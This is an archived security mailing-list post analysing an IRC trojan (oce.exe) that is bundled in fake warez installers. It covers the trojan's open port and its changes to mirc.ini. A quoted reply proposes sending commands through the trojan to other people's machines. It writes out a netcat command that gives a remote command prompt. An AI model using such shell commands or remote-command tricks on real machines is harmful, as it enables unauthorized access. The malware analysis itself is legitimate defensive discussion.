It's not the DO command of mirc, it's a buildin command, it's the equivalent of /QUOTE or /RAW in a irc client, this is send the data directly to the server At this time I have found 2 directly file infected: Packet Handler Firewall and FlashFXP v1.0, both distributed on a XDCC bot on #warez950-dcc. In a zip file with some fake .nfo and a SETUP.EXE (oce.exe) of 354k. quicktools.ocx (EZFTP OLE Control Module), Mswinsck.ocx are also included. Another interesting thing, the server open the port 15150, this is prompt: Enter your username:, probably a FTPD The trojan can also modify you mirc.ini, this is add auto-op, and modify your current script. > >With the DO command enabled, they gave us the means to remotely disable >this trojan. > >Something to the effect of; > >msg <nick> .do del c:\windows\system\oce*.* > >Then, msg <nick> .do <some evil command to lock up the machine, forcing a >reboot>. > ... > >The mIRC DO command is very powerful, and can be used to install netcat on >the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L >-p <any port> <your ip> -t -e command.com, giving a remote command prompt >to investigate/disinfect the machine. > > >___________________________________________________________________________ ___ >George Imburgia e-mail: gtiat_private >Systems Administrator Phone: (302)739-4068 >Delaware Technical & Community College Fax: (302)739-3345 >Office of the President Pager: (302)741-5962 Samuel Cossette clusterat_private
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:18:39 PDT